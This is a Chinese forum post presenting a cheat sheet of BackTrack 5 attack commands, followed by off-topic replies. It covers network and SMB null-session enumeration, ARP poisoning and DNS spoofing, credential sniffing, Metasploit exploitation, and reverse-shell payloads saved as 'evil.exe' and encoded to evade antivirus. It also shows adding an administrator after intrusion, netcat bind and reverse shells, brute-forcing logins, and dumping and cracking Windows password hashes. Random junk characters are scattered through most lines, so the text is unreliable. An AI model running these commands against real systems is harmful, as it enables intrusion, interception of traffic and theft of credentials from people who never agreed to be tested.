返回列表 发新帖

BT5渗透常用命令整理| →『网络安全区』

344.1k 10
kjeittccdf 发表于 2015-3-28 01:43:00|湖北 | 查看全部 阅读模式
whois 域名/ip 查看域名的详细信息。5 S7 G  X- V! p& _! R8 n$ d
9 Z. o9 v4 Q' q( Q* u1 C
ping 域名/ip 测试本机到远端主机是否联通。- p  K% C/ A' O; A% d
$ ^1 s6 o, G# Y/ x4 G
dig 域名/ip 查看域名解析的详细信息。
( t4 k& c; j+ ?3 W0 @ ' f/ t4 B) Q  w7 s' k
host -l 域名 dns服务器 传输zone。
, P3 k' l2 r2 Q$ i8 O: H
+ T+ p* H4 ]6 T; T  h扫描
1 h* d8 H. F3 G, ^6 K# {1 _! E
# m& m- d+ U3 q5 Q7 lnmap:/ l3 J6 ~4 m$ I6 T1 `/ [: r
- [" s4 j, d0 X9 h/ |
-sS 半开扫描TCP和SYN扫描。9 O- W% x& N6 r% m

% V3 D- ~; k% D: |-sT 完全TCP连接扫描。% q% P3 P! G/ u1 D! M
' z5 x# ~% r9 ~$ a1 Y/ e# W3 \/ D
-sU UDP扫描; M9 c. j; L4 b" t7 |; r5 m

- J5 M' E* X4 Y6 F2 u% g6 F/ U/ }-PS syn包探测(防火墙探测)  M* `, h& l$ m9 @

; P; A$ v5 G- k) q4 Z8 [-PA ack包探测(防火墙探测)# C6 n  W/ ^$ J6 ]$ w. Q4 q1 t0 h! \
* ]9 O+ G( m' N/ o, l
-PN 不ping。
0 [  Y: m  x! j7 ~$ v' l: s 9 J! N7 X  g% z: M; R2 Q& o) n
-n 不dns解析。: K! L! T: Y; m. g& U0 |
1 `% X: _' C- i, O' F9 C
-A -O和-sV。  P; v! G4 P3 X5 u, @& c

4 V3 v# f; d4 f& D, Z: ?! C-O 操作系统识别。8 n9 x  P- b( T

6 F: D, S" ?6 J/ X4 R- i) P-sV 服务版本信息(banner)
  F7 R4 s4 z4 }+ G, a
4 ]; `) x8 R2 `. l# }. a* p-p 端口扫描。
& y. C: g) z0 n# z' p) K+ u / k7 q  v1 p& p0 y4 B( m2 v
-T 设置时间级别(0-5)' J( j5 P" G- c6 f# `- Y/ @
9 \8 J* y/ K8 O9 [
-iL 导入扫描结果。4 o. P5 ^" }, M4 Z. I+ v

6 z& P6 X2 B! h* k  P-oG 输出扫描结果。
5 ]/ ]+ E7 m0 `  A' d: h7 R, j) ? , |8 V( a! O/ f  D6 j$ {/ V
" Y( }6 G0 \5 n; U; m* O5 x

9 W6 Q1 v2 ]& c9 u  }操作系统识别:
# L, Z8 Y5 _8 f0 O" @+ Y! C " w! D9 P! H8 T# U; H  U2 k8 W$ R
p0f -i eth0 -U -p 开启混杂模式。
5 W  N" s$ _/ O
  j* j- l7 v% O' v+ C! j8 A5 zxprobe2 ip|域名 检测os。8 T2 Z- I/ p. k0 @3 J5 r
# W# I4 O7 k1 ]" [; y
banner获取:1 K1 U8 ~, W" v, [
6 }) c) Y5 v8 l, L. I0 Q
nc ip port  检测端口是否打开。
0 p5 X: E1 ~& [" I7 Q* i
3 K8 b( q* I: [: Z; B- ?' itelnet ip port  检测端口是否打开。, T1 z2 s( X$ h6 B. ~2 K1 ]4 A" H* }
! e5 C1 N$ G) d  l5 s! W
wget ip  下载主页。# e4 ]. b8 j( B2 C% I
( w# r' m  @; y6 x1 B2 m+ ^7 T
cat index.html | more  显示主页代码。# X7 I* @& _1 }) Z- W& m

7 [$ G! R! j* Dq   退出。' t0 G6 j; T: U' b) t

7 }' @9 [5 N3 Y0 h3 C% Rwindows枚举
& g' b/ D+ w. h) Z0 n
2 j5 E4 Z* B9 R. \nmap -sS -p 139,445 ip  扫描windows。# s) _0 ]; n! _3 N2 a0 e

$ p6 w+ W& D( f- K) Ucd /pentest/enumeration/smb-enum . ^  c) o- x& Z! g
" P" X& W$ z% [# g
nbtscan -f targetIP  检测netbios。
  [7 ?1 U" W5 r 7 S2 t* i7 h* k: b
smbgetserverinfo -i targetIP  扫描name,os,组。0 h. h3 L- m' g

+ f) F, K6 A# q" @6 B' t$ v# Fsmbdumpusers -i targetIP  列出用户。
4 m6 R$ @8 k1 Z, G' t  | + ]2 R( [4 t$ ~0 g; e& w6 a( {, ^
smbclient -L //targetIP  列出共享。. C- J; Y$ H' }7 @

0 i  |. O0 W$ R" S6 U$ H使用windows:
& M( k, I: t5 ~) W
' P+ p; {8 R( O7 C- b" ?+ wnet use \\ip\ipc$ "" /u:""  开启空会话。0 H5 \. d3 j" p' a( [3 T- h' E) g6 Z! o
( k* t* ~/ c, A. B* d
net view \\ip               显示共享信息。( ], T) h( g6 P0 `/ |
6 q, W$ K  O3 ]2 t; ~$ w- B
smbclient:
; v/ s$ l) O& A" I' z- b! j
' ^: z( r5 E) l8 usmbclient -L hostName -I targetIP 枚举共享。
* b8 k2 ^, b0 ^' p: b% S 7 L' A4 M5 u* }. \$ v! |
smbclient -L hostName/share -U "" 用空用户连接。
' C% e, y" p( H' u8 W0 E5 n+ q. n( a
; i. m  f- f. [% jsmbclient -L hostName -I targetIP -U admin普通用户连接。; C' y8 y% j1 z- j; w+ L, c9 X" I

+ x; Q( g/ v$ \: |1 Irpcclient:
+ U8 ]0 R! @4 H1 E. Y
4 W: v+ F$ q% ]! qrpcclient targetIP -U “”打开一个空会话。; x8 K: ^: \( Q

, [4 z3 Q5 H( D. X- }7 m! |, [netshareenum  枚举共享。7 F; S- u: N9 c( |: n! ^

0 F* D5 b0 k7 b) E* Lenumdomusers  枚举用户。) o7 a) h+ l0 X' W% c
6 {9 o6 o& P0 I5 g
lsaenumsid    枚举域SID。/ S% R- A( J& q9 z

, q: n& y; p$ z# Bqueryuser RID 查询用户信息。
2 K8 B  e& L# U1 \2 Q
$ t( \+ d, M. n, o; c' E0 Kcreatedomuser 创建用户访问。- l8 m* d  V; F! T9 M
& v- C- g& j$ e6 y# ~' j
ARP欺骗:
7 e  Z3 w4 I7 a" D; Z
: v$ E/ A% w- s! wettercap:
3 N1 Q) P" D9 ?* n; D8 p
& y6 M; N- g7 I1 s& R3 Snano /usr/local/etc/etter.conf配置文件; v- \0 \. i" C* }" p9 U
2 h4 M, `/ ^& b$ C
Sniff > Unified sniffing > Network interface: eth0 > OK  设置抓包的网卡% {5 \: o4 b- ]
; E  F- x/ Y# n6 N, {' `1 T
Hosts > Scan for hosts (do this two times)扫描网段的主机
8 u4 {) ]+ F; V/ Y# R1 \
1 F3 N6 k5 D+ o6 v- R5 {9 E' ?- BHosts > Hosts list 显示主机列表
# @3 X/ b- q. O9 n, c6 r # M7 h7 t  R9 G' P& z
Select the default gateway > Add to Target 1 添加主机  |- h* w; e! \  v) w* h& ~+ E0 A+ ~
2 o, s' S1 W! s) c* U
Select the target > Add to Target 2 添加主机
% L/ r" h' d# r) L 5 Y! E! r6 Q% R* W
Mitm > Arp poisoning > Sniff remote connections > OK  设置ARP攻击
2 F: s' s4 q1 p  A # v: X; l" w& `& Q
Start > Start sniffing 开始攻击9 S$ o/ w; G' ~: ?( H
; D: c9 W. c# s& Q2 x& T
dsniff -i eth0 监听网卡窃听登录用户密码. c1 }0 t4 E: _* a  M: r# a

  A0 O& i% P7 E/ p; |; Y5 Eurlsnarf -i eth0 嗅探http请求
+ d8 h, g# U- G : D: S8 J2 M, W1 X' a" E/ r
msgsnarf -i eth0 嗅探聊天软件的聊天内容
& K( y; A2 }! U# `# g 0 R6 k" P- i6 h* D% ~* Y1 }
driftnet -i eth0 网络管理嗅探图片,音频。
% Z/ J" N1 W  Q' {* \! ] # }' E, ?. v, P$ n
nano /usr/local/share/ettercap/etter.dns编辑配置文件
4 u. Q7 R. Y% \ # x! n5 X$ k& _) K+ g4 l
Plugins > Manage the plugins > dns_spoof 设置dns欺骗
3 Z% J* {, Z  K7 ^
, d- V* x* k6 v! Y* R- ~Mitm > Arp poisoning > Sniff remote connections > OK 设置ARP
' L6 p1 O3 c2 c! u
* H4 Z7 z3 I& P" `# Y8 z& v+ CStart > Start sniffing 开始攻击! G& R/ }; Z5 s5 G
$ }" w; D! W/ O" j  Z: Q
8 T% F! |0 u* n& u" J% E' k

4 i+ q) t5 a8 S, n( L5 u- ?Exploits漏洞利用:
( J& M7 p. \8 U& N
' N+ z2 k( t' O9 jcd /pentest/exploits/exploit-db 进入目录
, n7 I2 j9 Z0 R3 r/ }
& a/ e7 y1 ?9 f8 U0 zcat sploitlist.txt | grep -i [exploit] 查询需要的漏洞
4 E' S3 u) |: {6 E 5 d2 \2 }1 U- D- f
cat exploit | grep "#include"检查运行环境/ D: }* H9 C1 c: r/ F# u. `5 @' y
6 t) h5 W5 |' y8 Y! E0 R% f4 a
cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u只保留可以在linux下运行的代码4 {( ^8 S! w; P0 q
" A1 Z( ]) f3 N& n/ C% [7 F

2 g6 D  T1 `' |  m1 ~/ m
. o' [. W' I1 ]- {; }0 A$ lMetasploit: ) ], y% ~2 Z1 _& g+ c9 n

" _5 _6 P  f, v- \svn update 升级
5 ~7 l8 p3 x/ i! ?/ ]
& H/ @8 B1 y7 ]" A- w. O  y./msfweb Web接口127.0.0.1:55555。.* K5 x# b- e; O4 z: g
0 B/ x3 i6 s+ u" O4 {. S8 n- `) d
./msfconsole 字符下的Console。" X9 i$ D% A" i! q! ^& r. u
3 r" R8 `( S7 V0 V# I1 }7 G
help 帮助9 i8 P8 W4 T: R; l/ v' M  P' g

) S9 S( Q7 B" B0 M5 V; c0 Dshow <option> 显示选项: ]) l% m& @5 V4 D

; h* S# e7 |; m7 Isearch <name> 搜索名字
  ]7 ^% X, q5 w7 L/ X9 ^) s, z3 S ' y( T( {2 D+ Q% Y: E2 Q
use <exploit name> 使用漏洞) H( s% f0 L& j$ x- D
6 J$ K. ]5 s/ b  A" V! @
show options  显示选项/ o3 h/ r$ r# E6 S
: G7 }/ k% y9 i' A) w% T. t4 x
set <OPTION NAME> <option> 设置选项: j: m2 d1 S2 j( O
8 l+ ?2 I2 w" F( j4 q$ J# w7 p: \" K
show payloads 显示装置
* S8 l2 ~* _% g# p! d) M 4 J, s7 ]* D' V. F/ s4 k) S
set PAYLOAD <payload name> 设置装置: a$ p2 T; q2 W- t* p

7 B4 W. s/ P0 T% j6 Rshow options  显示选项
5 F: d2 P" m2 u4 F. f% ?* I: y! D
+ t$ P3 ^8 O- t! [. J, n# Aset <OPTION NAME> <option> 设置选项$ j+ S! n! T( r0 Z, i
1 o+ n6 Q  m7 T8 l
show targets  显示目标(os版本)' P$ {  Y6 S. c

: h( M5 Q; f+ Oset TARGET <target number> 设置目标版本
4 p, b5 t& b( p
: v+ C: ]! S/ t* {8 K) Q5 P& oexploit 开始漏洞攻击
9 _! |9 M% c9 R7 k9 @$ w- l
, G( i- Q8 V5 h8 u' a! jsessions -l 列出会话  V) a; @4 s6 x5 p' v: V+ h9 o
. L+ C" Y3 C6 U& f$ J: m6 `
sessions -i <ID> 选择会话% s# D: U6 u: N) l7 y3 Z
6 @" ]! k+ t( k* [5 ~7 K" n0 k2 a
sessions -k <ID> 结束会话) M4 Z& L; L4 F# `

/ w) K- W1 s2 c; b) v5 g<ctrl> z  把会话放到后台
' l" t- F5 y, p/ N   g/ j/ m) W3 J& g. P
<ctrl> c  结束会话* h" n. X2 V6 e  v' q8 C' R3 H+ M. l
- A9 U; t5 }5 l% I' n1 d, o
jobs   列出漏洞运行工作
2 V$ w1 o% q  o( U; M* `, V, E
8 M0 o  f# f0 x( j' }! Z' g" yjobs -K  结束一个漏洞运行工作! v* t7 Y: D) e* F' L

7 y# B% e2 w; k2 [show auxiliary 显示辅助模块
6 f$ `* G. Z9 |. A# h / ~  b' `" z. {; ]. x* A
use <auxiliary name> 使用辅助模块1 i0 v2 V# Y( }* V
+ u, c3 X1 R* Y+ J. y
set <OPTION NAME> <option> 设置选项
: W) l( p. s" F1 y  U
0 x% y2 r- H8 e* j$ _( ^run  运行模块
7 r; t! J. D; s) u& \7 c
( b- w2 p1 @. ]8 p3 D! K/ [scanner/smb/version 扫描系统版本
, X2 S- \# G: q/ V
  J: x" t+ `+ W, n% R# Wscanner/mssql/mssql_ping 测试mssql是否在线2 L/ f/ l- x; @2 n

; l: d/ Z( o. o4 _8 sscanner/mssql/mssql_login 测试登录(暴力或字典)
4 m3 i" ~& h' x, v " b" }1 {; s9 a0 \
Attacker behind firewall:  bind shell正向
! a& S+ [& [$ R- M* m( \) R - f/ O0 j6 E# Z* t& e6 N" H5 ~
Target behind firewall:  reverse shell反向8 H4 \9 I  h! {; z

* F' `8 w: N4 O6 S2 qMeterpreter衔接不懂dos的可以用这个:
2 E7 R+ P) r& v) J2 H! A+ Q
+ t) Y: X* \/ Y3 ]4 ?3 u% p+ _db_import_nessus_nbe 加载nessus的扫描结果
/ }* x; ~; L5 m6 {+ | 2 r3 s2 j  G! `8 I* ]9 R; K; ]
db_import_nmap_xml 加载nmap的扫描结果
) @2 P7 l  }2 U1 C! c1 a
3 X# w: I1 A9 }; E7 Z) H* l4 y8 C7 O自动化攻击流程:8 }: Z# C, r; p& I) Z! n6 D# S
  k1 I1 Y# F; K/ a+ ~+ `
cd /pentest/exploit/framework3 # \1 E& t' Q& C4 l( l- Z* L- n" c
! `4 S; |7 G4 w
./msfconsole
  Q0 {6 Y: F" E. v4 c9 Y5 v0 [
( c7 H: i8 z( T  ~load db_sqlite3
0 P9 ]6 J$ m' p+ d; \+ d , d6 @% D, H4 j7 P6 k4 }
db_destroy pentest
" ^5 E0 F+ Q2 C+ z8 T! l 5 I" S; Z7 z( P& v  S2 I
db_create pentest* }$ J4 C6 u3 E5 f1 P) H+ i

8 Y/ |* w4 G1 a7 E4 a) Qdb_nmap targetIP3 s2 P1 @, e, P
: U1 t* d# a  |3 w) ~4 W0 {/ B/ v
db_hosts1 w" Z* M! R0 e
) v, X! u# L& @5 \
db_services' N* H, v1 z& c$ s+ V6 ~6 ^
; @" N* ]- P; d. W) y& I+ ]
db_autopwn -t -p -e, }$ B- H! E# |6 D, |

" M0 Y7 Y: l& F8 i$ s! h3 Q" [! K. m字符接口攻击流程:
6 A. j6 R. q& T& {& |7 v* F! Z ( d& m# p0 b5 H9 R2 p% L
./msfcli | grep -i <name>
1 R5 z# l. I- v& P+ w% ~* L. h/ g : U% Q7 L3 ]& w( T( Y6 e7 F+ D. }
./msfcli <exploit or auxiliary> S) s% R" A# R4 Z8 t0 v* |: S

" _0 k1 N+ x' u, Z./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E
! K: {- `3 w4 }/ f+ G% g0 N , G7 b% v: ]) U' y8 K$ o
做木马后门等:! n/ r+ e( a: t

- I* J/ }. J& }./msfpayload <payload> <variable=value> <output type>/ `+ _  w4 Q( ^# ]" g9 m# h$ z

% R; ~8 f; j' w$ L! h3 x; YS        summary and options of payload1 {, M. g. C) w
6 R) p) ^3 s/ ?" I' {% _- h" ~- u
C        C language9 f# s7 k( S2 X4 x8 z. ?  i+ r% _" |

" p* a8 u" `6 b* @4 cP        Perl/ d/ ]  y+ p. C( ~9 b

0 k0 X7 o& o# O: @* [y         Ruby
) |6 z3 L$ d, J
3 @$ P. t% m- m- J$ x2 K; SR        Raw, allows payload to be piped into msfencode and other tools6 \$ q8 u& Y! @/ E

2 O7 z4 d: @* XJ         JavaScript- M+ L- I: F' a  ]4 ^& T8 B+ b3 D
0 ~) S8 `* V1 G  y/ r) m8 K2 Q
X        Windows executable
: m# u% \5 |9 x. X' t/ I1 F3 ^ ) g" k( B6 M) A9 g$ [7 @
./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C
- F0 M6 b$ A/ m( D  e
( B; j$ V0 R$ [9 `0 J! Z( U8 B/ ]./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe: E1 Z/ c% r* v9 ?2 E

9 g. X/ Y# w0 J' O6 u4 O4 j& {编码处理就是做免杀:8 C2 q1 ]; i' V
# m, J8 F& \% N( ]6 L+ ^. b  L
./msfencode <options> <variable=value>
# ]  q) l7 \6 i: C" o0 R 9 l7 J6 g+ a' o# |6 e! Y
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -l
; E; T2 z: ]# U: U
, @: Z0 Q1 }- _./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &#39;\x00&#39; -e PexFnstenvMor -t c
) s4 x# c( r7 X; `/ I4 Z2 m/ i
5 M; ]6 A9 {4 N/ U " U0 Q  A5 Y  k: B* X6 ^* R/ C
8 {/ N' u5 _" }3 [- e0 A
入侵后在windows下添加管理员用户:% H0 k% j. x5 ~
8 B0 i$ v/ z" z2 ?. Z' F8 }$ W
hostname 查看主机名
# |9 o+ `# }6 {9 s5 s" n8 q
! `, U5 W8 T/ E6 G3 _2 w7 ]net users 查看用户' U% ~  U  `9 ?( ?1 S9 B

" r. e4 x- p6 Fnet user 用户 密码 /add 添加用户
4 V* j5 `' u' _' b4 p; _, w1 \; |
# o1 ~0 x5 r) P5 ]; k- M& Snet localgroup 查看工作组
; A0 z% ?4 Z; K) I! w" K* l
. t* I; E! |* r/ I- tnet localgroup administrators 查看管理员组
2 _; G6 K" A: Z8 R1 }) R& R ; I0 T6 s/ u# m2 k. [! h+ J7 K! [1 t
net localgroup administrators x /add 将用户加入管理员组
3 x% e' n2 h) M, s, ^' M   X8 y; y2 V: m5 m

" W- |; P' e, }6 n( ]& u6 k8 [8 c7 T( F
% [% Y$ B0 l; g. N( eTFTP
1 |; l5 L0 p3 j  g
+ S1 q# p0 H4 r7 Ocp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上. _4 j" R) Y& r+ r

8 `4 O" A9 t: C6 ]tftp -i 10.1.1.2 GET nc.exe下载
6 y. n. H1 _( c7 E) L. W
4 }0 A/ j2 f- |! d7 J9 A- }netcat瑞士军刀
* O8 p; T# t( z& Y1 n 5 u% ~6 ]+ D5 |+ E- x5 J1 a% ]' B: E0 i
attacker:  10.1.1.1 9 ?* L9 l  ?9 _( L9 p: F& P( H: m

; n: b# y( `9 f# b9 T2 m8 J/ i# B& etarget:  10.1.1.2
4 S; x" ?: F2 p; w$ Y" v1 h5 ^1 X 6 y# b$ Z: C0 \8 e2 |! ?; l! e
nc -v -z 10.1.1.2 1-1024 端口扫描
7 l0 ^, k1 a0 S6 D 9 J% K, H! W; S
target:  nc -lvp 4444 聊天设置(服务)) Y; Z6 O2 l; k

) w/ {5 I/ |/ }1 ?/ x9 D; b* B, R6 tattacker:  nc -v 10.1.1.2 4444 聊天设置(客户)
/ p' P; v  X$ Q; l3 v/ k$ @) p ( n. Z# A! g9 M" I' d5 q, T: d
target:  nc -lvp 4444 > output.txt传输文件(接受)
1 }0 J# J( h: [3 j
/ W1 a2 m* R0 l, }2 l. y. vattacker:  nc -v 10.1.1.2 4444 < test.txt传输文件(发送)+ C7 A2 z; \: G' L, t3 G2 E7 E
5 h4 i% [4 m  _
target:  nc -lvp 4444 -e cmd.exe  Bind shell。
0 }2 w* ~: m" M5 X + W& K, [/ c4 R* U: J- ~
attacker:  nc -v 10.1.1.2 4444
# o6 _( w8 S" q" k/ J: k " ^! k5 |  z' |
target:nc -lvp 4444  Reverse shell。
4 ~$ U  R, T2 t# i 1 g3 k7 @6 q7 C  r) K; B8 S
attacker:nc -v 10.1.1.2 4444 -e /bin/bash) V' s: `: F, ]8 i: P- e

  @3 V; N4 \# \0 p   ?9 S3 a9 w- U% L& g" `8 N

8 ^" o- z! I+ J5 Q: t4 s0 P密码% b) F6 V8 _* W$ C

* |  q  M2 r3 H1 p! d; M0 q# r字典zcat /pentest/password/dictionaries/wordlist.txt.Z > words
6 ^3 L/ _9 M8 p5 f : F% m2 g0 V" p$ C1 c9 U0 K" d
cat words | wc -l显示个数(30多万个)     
7 ?# S( y& }5 E, X. \
. Y7 F& a" O7 I( u! H5 p( O/ c* Y暴力:
$ c) N- Q8 ?7 x+ a
, y. G: Q- l0 uhydra -l ftp -P words -v targetIP ftp 攻击ftp。3 N3 I1 b  }$ X$ V5 X0 }. @

. E4 \$ y, c" [hydra -l muts -P words -v targetIP pop3 攻击pop3' b( e! l# m& K( `9 k% n: g! |
; m) L6 p  `; z9 E
hydra -P words -v targetIP snmp 攻击snmp" U8 X2 V' M6 O( U. s* O

2 K2 B/ q5 \9 V4 T攻击microsof VPN; N/ `8 k* w# m8 X- D/ s8 l
( }( `0 M/ ^) @0 E4 l# O
nmap -p 1723 targetIP. _8 M' A" X# `& K7 n+ @

8 l  S4 v0 Z$ K" o  @8 u" Gdos2unix words6 J# B8 g, v, ~
2 Q( I  T! l' V' \
cat words | thc-pptp-bruter targetIP
& z' M  f' ^% [; n& p/ o9 p
' [. Z) g1 \0 s7 TWYD:
- f& k: d$ y5 |8 e . ~. g% _; D1 b8 X) R/ \$ r' G6 K( }! ?8 K
wget -r www.target.com --accept=pdf 下载pdf文档
1 A8 b4 R2 b/ ~5 [! W
! {0 v1 Q4 r2 J# k  e6 P- B/ ]wyd.pl -o output.txt www.target.com/
& B; Z7 @$ p' u/ S% m) | + O2 q3 W" n8 i( Y: s
cat output.txt | more! {/ D( w% }, Q1 J4 r6 p" C

6 k9 [3 S& K9 t/ C$ w% c+ wSAM文件(windows下的密码文件):* L8 Y7 d8 l4 ^
3 j) q3 D% {, [+ `
%SYSTEMROOT%/system32/config
3 s* M+ x; E0 V$ a( t3 Q  b$ R ) p$ ^! y' ]5 y" j
%SYSTEMROOT%/repair
4 M7 _- }3 f- Y3 v7 ]$ i& a/ ~
  q$ k( r! |/ ^3 ?  P# F备份windows的hash文件:) U* d! `2 o* p0 o- i8 X9 L5 w7 v
$ D9 [  ?+ M' Y0 w& `9 B" {
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
  w* t6 l8 k+ J0 k! O
; H3 ?2 W! T% L, J8 K. F& `meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\6 c8 ~! z$ D- G. J" w
: D# W# D" w5 @5 s+ R+ S7 {% f% [8 r+ M
meterpreter > execute -f cmd -c8 ~3 R5 s' d5 v8 l
" R4 X4 w  s! A, a5 y  t
meterpreter > interact x
: D) J. g( E* d
! N" N7 G* X7 k& ^& q* m! r4 rC:\WINDOWS\system32> pwdump \\127.0.0.1
: a. q) k% w# `' N: K3 V
$ H! i3 F) w4 D1 _! Y) ?john破解密码:& `3 Q! q: D  W' d

& o% y) C" T$ _( T2 ^cp hash.txt /pentest/password/john-1.7.2/run/3 o' N3 j! V" G- N2 A- i

+ R7 Q. o* Z0 {. ycd /pentest/password/john-1.7.2/run/8 C: {# u# m) Y) d' }% @
; a. `2 P: a( P4 q
./john hash.txt
6 r1 R+ o. b' X. ]* T( g + z9 Y" ~( x6 [7 E1 D
彩虹表:
* d- s7 R0 |/ p! W% y9 {# U
+ k/ a/ E: T4 s' W) K, F3 \) |rcrack *.rt -f hash.txt
9 }4 m3 v: ]5 v2 T7 o* P
" {( ]* X8 d, h+ T! P# A6 E! S9 r. v
6 l  S* d6 T  {4 U, ]# C0 S
$ x4 q5 q: P% @本地修改密码:
  {3 z: f0 l8 \& j1 { 2 d& Y! F# c. J7 ]% V: o
mount# Y2 c  O0 y9 B
7 L9 N. V" u& Y8 ]3 S
umount /mnt/hda1. c$ T  n; F; K

4 A- v" f9 r; H% v+ }4 U+ C3 `modprobe fuse
- V& j" ?! ^5 o7 ^) D4 h 0 H: I3 b( g+ ~: ~. C: x# g+ q' f
ntfsmount /dev/hda1 /mnt/hda1) s1 H- v( f6 o( Y- n

) U5 k+ a) X  b7 E) i6 q3 N& ~0 m7 omount

回复|共 10 个

亮凌庚 Lv.15 发表于 2015-6-23 22:00:05|日本 | 查看全部
哈 你逗逗他啊
kwjvtwzx Lv.15 发表于 2015-6-23 22:00:51|湖北 | 查看全部
baidu是相当能折腾我了
efiew Lv.15 发表于 2015-6-23 22:07:09|法国 | 查看全部
挨骂也是幸福~~~
swmozowtfl Lv.18 发表于 2015-6-23 22:08:57|德国 | 查看全部
我怎么就踩不死你呢??
xiaoye Lv.9 发表于 2015-6-23 22:24:12|日本 | 查看全部
本人过去、现在以及将来都不认识楼主,且自古以来与楼主无利益关系。楼主表述之事与本人无关
gevaemaidovef 发表于 2015-7-25 18:00:25|美国 | 查看全部
哦...这个...偶昨天就看了....
bqtklouu 发表于 2015-7-25 18:15:57|Reserved | 查看全部
楼猪.重量级人物阿.
wwdu926a 发表于 2015-7-25 18:16:58|INNA | 查看全部
嘻嘻~` 要是只看你的话~`~`` 很容易让人家以为你也跟偶们一样是天使类~`(偷笑中````````
buingeEvineus 发表于 2015-7-25 18:20:08|哥伦比亚 | 查看全部
好吧...那你说...
kpasd Lv.3 发表于 2015-8-28 22:40:30|山东 | 查看全部
谢谢了。。。 我很赞成,继续努力吧6 O% I  w/ |( W- ?1 O2 j

$ W# {9 F0 t' ]- Y; X9 p/ S. }& z4 ^$ }1 d5 I5 h
! B* w2 z$ o. C
9 x" D. \% I7 N& q: i; E0 Z

' o$ I2 M, s1 z* b, h+ N& t: E
9 L0 Y- z9 Y* d  J  p) Q2 t+ E5 ?& z/ l6 G, N2 N
. v- j# L$ L5 Z" o8 M0 s2 A. d. E4 I
2 l6 i! g- f7 [1 b' g" ?2 a
" s1 Z5 q. O- o  q. Y7 R
: K$ u& F; \0 I2 v! M/ ]  |
% T: f# R/ O. V& G* H# z2 [4 `$ [# M
                               
登录/注册后可看大图

  |0 P# R9 _' g, [' B
2 d+ u/ j* t8 z5 H/ \9 a: Y
                               
登录/注册后可看大图

回复

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

得知互动是一个融创意、设计、开发、营销、生活、互联网于一体的专业交流分享平台。
Copyright © 2026 得知互动-专注Ai与站长技术交流社区-Ai交流平台 版权所有 All Rights Reserved. Powered by Discuz! X5.0 鄂ICP备15006301号-5|鄂公网安备 42018502006730号
关灯 在本版发帖 扫一扫添加QQ客服 返回顶部
快速回复 返回顶部 返回列表